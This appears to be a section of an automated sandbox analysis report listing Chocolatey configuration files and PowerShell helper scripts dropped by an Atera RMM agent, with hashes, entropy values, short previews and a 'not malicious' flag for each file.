                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Db........... ......c..........c.. ....c...@.. ........................e.......e...@...................................c.L.....c..............de.0(....e.......c...............................................c.............. ..H............text...w.c.. ....c................. ..`.rsrc.........c.......c.............@..@.reloc........e......be.............@..B................H.........A...!.........H....3..........................................0..T.......r...p...o......9,....s......o......o.....o..........9.....o...........9.....o......*.........3..........7E......"..o....*...b.:....~....*.o....(....*....0..s........:....~....*.o......9......i:....~....*.~....:...........s.........~....(...+~....:...........s.........~....(...+*.....6..r...p(....*.."..(....*...:.(......}....*..0..+.......s.2.....}.....r...pr...p... 2..s....o....&*......0..{........o..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\config\chocolatey.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9380
                                                                                                                                                                                                                                        Entropy (8bit):4.897876021534469
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:rwhyxWvf7L6ZapbrzRmXBzCWKZD68NJ+IK2E8V1ExAuVXI4n7rJ+ZXVx:sjL6Z+Ht6B+WshDK2EiEJ7lEFx
                                                                                                                                                                                                                                        MD5:9D1528A2CE17522F6DE064AE2C2B608E
                                                                                                                                                                                                                                        SHA1:2F1CE8B589E57AB300BB93DDE176689689F75114
                                                                                                                                                                                                                                        SHA-256:11C9AD150A0D6C391C96E2B7F8AD20E774BDD4E622FCDFBF4F36B6593A736311
                                                                                                                                                                                                                                        SHA-512:A19B54ED24A2605691997D5293901B52B42F6AF7D6F6FDA20B9434C9243CC47870EC3AE2B72BDEA0E615F4E98C09532CB3B87F20C4257163E782C7AB76245E94
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<chocolatey xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">.. <config>.. <add key="cacheLocation" value="" description="Cache location if not TEMP folder. Replaces `$env:TEMP` value for choco.exe process. It is highly recommended this be set to make Chocolatey more deterministic in cleanup." />.. <add key="containsLegacyPackageInstalls" value="true" description="Install has packages installed prior to 0.9.9 series." />.. <add key="commandExecutionTimeoutSeconds" value="2700" description="Default timeout for command execution. '0' for infinite (starting in 0.10.4)." />.. <add key="proxy" value="" description="Explicit proxy location. Available in 0.9.9.9+." />.. <add key="proxyUser" value="" description="Optional proxy user. Available in 0.9.9.9+." />.. <add key="proxyPassword" value="" description="Optional proxy password. Encrypted. Available in 0.9.9.9+." />.. <add key

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\config\chocolatey.config.8132.update

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9380
                                                                                                                                                                                                                                        Entropy (8bit):4.897876021534469
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:rwhyxWvf7L6ZapbrzRmXBzCWKZD68NJ+IK2E8V1ExAuVXI4n7rJ+ZXVx:sjL6Z+Ht6B+WshDK2EiEJ7lEFx
                                                                                                                                                                                                                                        MD5:9D1528A2CE17522F6DE064AE2C2B608E
                                                                                                                                                                                                                                        SHA1:2F1CE8B589E57AB300BB93DDE176689689F75114
                                                                                                                                                                                                                                        SHA-256:11C9AD150A0D6C391C96E2B7F8AD20E774BDD4E622FCDFBF4F36B6593A736311
                                                                                                                                                                                                                                        SHA-512:A19B54ED24A2605691997D5293901B52B42F6AF7D6F6FDA20B9434C9243CC47870EC3AE2B72BDEA0E615F4E98C09532CB3B87F20C4257163E782C7AB76245E94
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<chocolatey xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">.. <config>.. <add key="cacheLocation" value="" description="Cache location if not TEMP folder. Replaces `$env:TEMP` value for choco.exe process. It is highly recommended this be set to make Chocolatey more deterministic in cleanup." />.. <add key="containsLegacyPackageInstalls" value="true" description="Install has packages installed prior to 0.9.9 series." />.. <add key="commandExecutionTimeoutSeconds" value="2700" description="Default timeout for command execution. '0' for infinite (starting in 0.10.4)." />.. <add key="proxy" value="" description="Explicit proxy location. Available in 0.9.9.9+." />.. <add key="proxyUser" value="" description="Optional proxy user. Available in 0.9.9.9+." />.. <add key="proxyPassword" value="" description="Optional proxy password. Encrypted. Available in 0.9.9.9+." />.. <add key

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\config\chocolatey.config.backup (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9380
                                                                                                                                                                                                                                        Entropy (8bit):4.897876021534469
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:rwhyxWvf7L6ZapbrzRmXBzCWKZD68NJ+IK2E8V1ExAuVXI4n7rJ+ZXVx:sjL6Z+Ht6B+WshDK2EiEJ7lEFx
                                                                                                                                                                                                                                        MD5:9D1528A2CE17522F6DE064AE2C2B608E
                                                                                                                                                                                                                                        SHA1:2F1CE8B589E57AB300BB93DDE176689689F75114
                                                                                                                                                                                                                                        SHA-256:11C9AD150A0D6C391C96E2B7F8AD20E774BDD4E622FCDFBF4F36B6593A736311
                                                                                                                                                                                                                                        SHA-512:A19B54ED24A2605691997D5293901B52B42F6AF7D6F6FDA20B9434C9243CC47870EC3AE2B72BDEA0E615F4E98C09532CB3B87F20C4257163E782C7AB76245E94
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<chocolatey xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">.. <config>.. <add key="cacheLocation" value="" description="Cache location if not TEMP folder. Replaces `$env:TEMP` value for choco.exe process. It is highly recommended this be set to make Chocolatey more deterministic in cleanup." />.. <add key="containsLegacyPackageInstalls" value="true" description="Install has packages installed prior to 0.9.9 series." />.. <add key="commandExecutionTimeoutSeconds" value="2700" description="Default timeout for command execution. '0' for infinite (starting in 0.10.4)." />.. <add key="proxy" value="" description="Explicit proxy location. Available in 0.9.9.9+." />.. <add key="proxyUser" value="" description="Optional proxy user. Available in 0.9.9.9+." />.. <add key="proxyPassword" value="" description="Optional proxy password. Encrypted. Available in 0.9.9.9+." />.. <add key

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\ChocolateyTabExpansion.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (965), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12946
                                                                                                                                                                                                                                        Entropy (8bit):5.132019659587194
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ctpHjcTfbZO0g2ZyAvGZkAsoXCxAziDR/67E4Pb:ctpDBCvGZkAsCCxAziDR/sF
                                                                                                                                                                                                                                        MD5:0BB54C9DA241E0EAAFB6C976AC07EAA7
                                                                                                                                                                                                                                        SHA1:045808C9106A4C356AB15A2D8680FDB737DC98A6
                                                                                                                                                                                                                                        SHA-256:071CE6FCE85051E373C1B05BB82A92FFB8BEBF34C768B7A2F6E809000A78479F
                                                                                                                                                                                                                                        SHA-512:C118C9FEC5903D1F2F6A6FA070130FCEBAAD70AF3459DA82069C5C8ED3D66CEE374C098C6247CCD528187B6856FAA458EBBD8B6F2C0C68C2A5B8EF32C2D7CD75
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....# Ideas from the Awesome Posh-Git - https://github.com/dahlbyk/posh-git..# Posh-Git License - https://github.com/dahlbyk/posh-git/blob/1941da2472eb668cde2d6a5fc921d5043a024386/LICENSE.txt..# http://www.jeremyskinner.co.uk/2010/03/07/using-git-with-windows-powershell/....$Global:ChocolateyTabSettings = New-Object PSObject -P

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\chocolateyInstaller.psm1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3903
                                                                                                                                                                                                                                        Entropy (8bit):4.986280475081154
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKoqWJBYc4R2wf3TQJb3jl7t3iv:cSyL+QGXHMWJB7VFUv
                                                                                                                                                                                                                                        MD5:1CF35331F337493A5B5B8C482E32B507
                                                                                                                                                                                                                                        SHA1:149D5B5ABB4FF20CFAA333946BAAEC6B8EFA5630
                                                                                                                                                                                                                                        SHA-256:CCF763934E3801002C260246316DF70C64C66E7721C24B300C634567F5885A39
                                                                                                                                                                                                                                        SHA-512:03652CA25D2A78860F735B57600B940D2723DD23E24A2632D5CA76DBFACBF95CD1090428FB6AC23BF945AB20C1C201155CF26161361853DB94A5D85AE753C0A1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....$helpersPath = Split-Path -Parent $MyInvocation.MyCommand.Definition....$global:DebugPreference = "SilentlyContinue"..if ($env:ChocolateyEnvironmentDebug -eq 'true') {.. $global:DebugPrefe

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\chocolateyProfile.psm1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1178
                                                                                                                                                                                                                                        Entropy (8bit):5.161789340951933
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:cSyJ3554IpgyZA0SU0E+SlHQk1GpsLAjQSDg6pucReEe7:cSyX54pyFd0AlH31KoLKRed
                                                                                                                                                                                                                                        MD5:610AD6370C8DACB3861200B8827DF768
                                                                                                                                                                                                                                        SHA1:E6831DF0C1ADB4664BDE6D2D48DCE28CC1918A83
                                                                                                                                                                                                                                        SHA-256:B06996C9A26663FCF41B2406D12C4597075AB7F94CDD320EEE64EAC9AEA95DFD
                                                                                                                                                                                                                                        SHA-512:C3A30128443E47D5D38CFD8C989E8317668EEDA6B4E85BEE94B76034479DEC0BED4C980ACD797153259CF0DF2807E79C3B3F4AAADF21E255A35BBDBE2F2E16E9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# ..# You may obtain a copy of the License at..# ..# http://www.apache.org/licenses/LICENSE-2.0..# ..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....if (Get-Module chocolateyProfile) { return }....$thisDirectory = (Split-Path -parent $MyInvocation.MyCommand.Definition)..... $thisDirectory\functions\Write-FunctionCallLogMessage.ps1... $thisDirectory\functions\Get-EnvironmentVariable.ps1... $thisDirectory\functions\Get-EnvironmentVariableNames.ps1... $thisDirectory\fun

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\chocolateyScriptRunner.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2892
                                                                                                                                                                                                                                        Entropy (8bit):5.176658574720988
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:RkBibyQwcYIRQcRwAshP5l8kRMCpEMwK/JvoPEY0nzWBIxjO0L5E8bWHtt6rh4:eiAc5HGAshhCQMChR/JsZYzWBeO85Ecm
                                                                                                                                                                                                                                        MD5:EF32E09F41D2F8234E4482C6B52FFFB1
                                                                                                                                                                                                                                        SHA1:446185592825F7B7894CC5A9E2FCB4F015B9E810
                                                                                                                                                                                                                                        SHA-256:ACC5E8AB085FDD00B1C333853D74B1EC15777212A435C2DE8B56A490BE07103C
                                                                                                                                                                                                                                        SHA-512:7273DE65F571C4302BAC73C3FA3AEBDB7887B923EABAC10457C2A2C329B67979726440ED0C5E190C7728676D9382D4C8E2F4D030336630BC82AC7AE2FB20B58F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.param(.. [alias("ia","installArgs")][string] $installArguments = '',.. [alias("o","override","overrideArguments","notSilent")].. [switch] $overrideArgs = $false,.. [alias("x86")][switch] $forceX86 = $false,.. [alias("params","parameters","pkgParams")][string]$packageParameters = '',.. [string]$packageScript..)....$global:DebugPreference = "SilentlyContinue"..if ($env:ChocolateyEnvironmentDebug -eq 'true') { $global:DebugPreference = "Continue"; }..$global:VerbosePreference = "SilentlyContinue"..if ($env:ChocolateyEnvironmentVerbose -eq 'true') { $global:VerbosePreference = "Continue"; $verbosity = $true }....Write-Debug '---------------------------Script Execution---------------------------'..Write-Debug "Running 'ChocolateyScriptRunner' for $($env:packageName) v$($env:packageVersion) with packageScript `'$packageScript`', packageFolder:`'$($env:packageFolder)`', installArguments: `'$installArguments`', packageParameters: `'$packageParameters`',"....## Set the culture to invar

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Format-FileSize.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1751
                                                                                                                                                                                                                                        Entropy (8bit):5.27319452124258
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:cSyJ3554IpXAAyU0E+SlHQk1GpsLAKFoYlMp9TlxNAZiTxGEXL5FGX/OFchWoCah:cSyX54q90AlH31Koyh9xnFVVc/4oqPli
                                                                                                                                                                                                                                        MD5:12E0A95C9BD0A49DA769C2927C648DFB
                                                                                                                                                                                                                                        SHA1:33174164C23D10B43E26CEE56E1A6FB60E8D9F4D
                                                                                                                                                                                                                                        SHA-256:3A2A002BD7213ECCE52FB82C470B824770A11DEB0A33DDB319A24824CE4676DA
                                                                                                                                                                                                                                        SHA-512:D19E22031409B216A10815FE606852712EF0136B9056541774DC66AE9C57994DE5A667AE1F925D547D1BCCF6AE9221D939F7CE2BFC87ABC98C634858E1CCAA7B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....Function Format-FileSize {..<#...SYNOPSIS..DO NOT USE. Not part of the public API......DESCRIPTION..Formats file size into a human readable format......NOTES..Available in 0.9.10+.....This function is not part of the API......INPUTS..None.....OUTPUTS..Returns a string representation of the file size in a more friendly..form

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-CheckSumValid.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (505), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):11504
                                                                                                                                                                                                                                        Entropy (8bit):5.008896354130034
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXHpi+o8HrDe07ZUWKVjakELFiuPOizDIinqSQ/fa:ctL+QGwKS07ZUOZPpDDyfa
                                                                                                                                                                                                                                        MD5:9443CB695D075DAA7DE91510A1E35C14
                                                                                                                                                                                                                                        SHA1:7676604D3C1F0BD26632DC41FCF1310908D422C6
                                                                                                                                                                                                                                        SHA-256:7095FB2F3F44FEE977D3B53DEE93B952D04325108B090F5F7E8503F758C27F18
                                                                                                                                                                                                                                        SHA-512:2D0B8C3345B6573F56A54D357BB700D83B3AB5A40DED0AA2DC5A40DAC0523DB86BBC5BAA10CB3B4B1785123B8F32CEC5A86F350AF315A2BFF6885C08BD77758F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ChecksumValid {..<#...SYNOPSIS..Checks a file's checksum versus a passed checksum and checksum type......DESCRIPTION..Makes a determination if a file meets an expected checksum s

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyUnzip.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10482
                                                                                                                                                                                                                                        Entropy (8bit):5.191184135569746
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXHphcdudY/xIVBO6zgV6ZlR86nFTDzH0sQsPbnJ8Yc9bTp05va:ctL+QGTqudY/xcBOSt3XHRJNva
                                                                                                                                                                                                                                        MD5:F740F29F0AC79C7E5BA69B1CF3E6DC74
                                                                                                                                                                                                                                        SHA1:8F609B5BDCCE295AEF29011858B31608D26E8E04
                                                                                                                                                                                                                                        SHA-256:550231F4568914C786BF3BDE0FF4897DCE761084D33CFA6D8FD462B34A779D88
                                                                                                                                                                                                                                        SHA-512:FC567A01086E8E6A55AAD1E3AEA0E9639E2F8C03399728A5421214E1E0CBF726A7D0F7422EBE3CE74C226F27C11C051760CDAD2AFBB5E69294152669929AB05A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ChocolateyUnzip {..<#...SYNOPSIS..Unzips an archive file and returns the location for further processing......DESCRIPTION..This unzips files using the 7-zip command line tool 7z.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyWebFile.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16502
                                                                                                                                                                                                                                        Entropy (8bit):5.146477219224201
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXHpWybOWetWKW3VjEve49W9cO1kazvJwKEDbrj:ctL+QGPnetZ2EvXOlybrj
                                                                                                                                                                                                                                        MD5:CD302EF4E080D330A9DEAFA584C049AB
                                                                                                                                                                                                                                        SHA1:53B98CD3540A35FF32E1E6DDA2BB3F786FAE23ED
                                                                                                                                                                                                                                        SHA-256:3E18EB6CF646474E9259E932679E04DF1CC4322E2E354A770F32A0F7D67C72A4
                                                                                                                                                                                                                                        SHA-512:B0D74A92DFB16CBE799C781CAD2702C6932BA5B15A28EE5AF2FB56A4CFA4317B2347AF227A9484A0536CC95674CFBB89343E3955C2457AFD0D23854963D85BFC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ChocolateyWebFile {..<#...SYNOPSIS..Downloads a file from the internets......DESCRIPTION..This will download a file from a url, tracking with a progress bar...It returns the file

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariable.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4123
                                                                                                                                                                                                                                        Entropy (8bit):5.288017280806032
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKotzWfp1Vr4MeAWMK13MqhPTv6ee5:cSyL+QGXH3Gp1VrSAQ3Mqg
                                                                                                                                                                                                                                        MD5:E564E914B196DAC040D08110D5D8718D
                                                                                                                                                                                                                                        SHA1:2532E9010D3A67A6FF345F2564A843800DC59CBB
                                                                                                                                                                                                                                        SHA-256:5AF7D3DC6B44142492B9E31A69352873D43D570D7D4718B2942A67D3D6180951
                                                                                                                                                                                                                                        SHA-512:06127E83C2BBDA160183D3DC5E51E652E2011C760B561DA639BDF847F085DB3E93E3C5F0B5C12C1114D228C3882E0FBC81418CF9CAA3C04FA837CE0A68574EFF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-EnvironmentVariable {..<#...SYNOPSIS..Gets an Environment Variable......DESCRIPTION..This will will get an environment variable based on the variable name..and scope while accoun

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariableNames.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2060
                                                                                                                                                                                                                                        Entropy (8bit):5.165746374691896
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoMfcM1KIcoCtJS0RjhYigLiO:cSyL+4pGXHFKovCZWdQ
                                                                                                                                                                                                                                        MD5:D4DF76AC88518CA76BD5EC4605C55781
                                                                                                                                                                                                                                        SHA1:8B540089E4B1AF183CF9D8053043BD4252A8B2BB
                                                                                                                                                                                                                                        SHA-256:F73E30026DC59EF1B1375FE869347BAE2E02BDC51117E17DD2717E7DE7F712F6
                                                                                                                                                                                                                                        SHA-512:BC37855DDEEF6BD3BECA66109F3EBE09B82409DD8EB1B6DEFC1ADCCEA397356FB521BC22CA8B7D34A418EB6EAAC1E9B277CBD333251A149C46E104980FBF3071
                                                                                                                                                                                                                                        Malicious:false
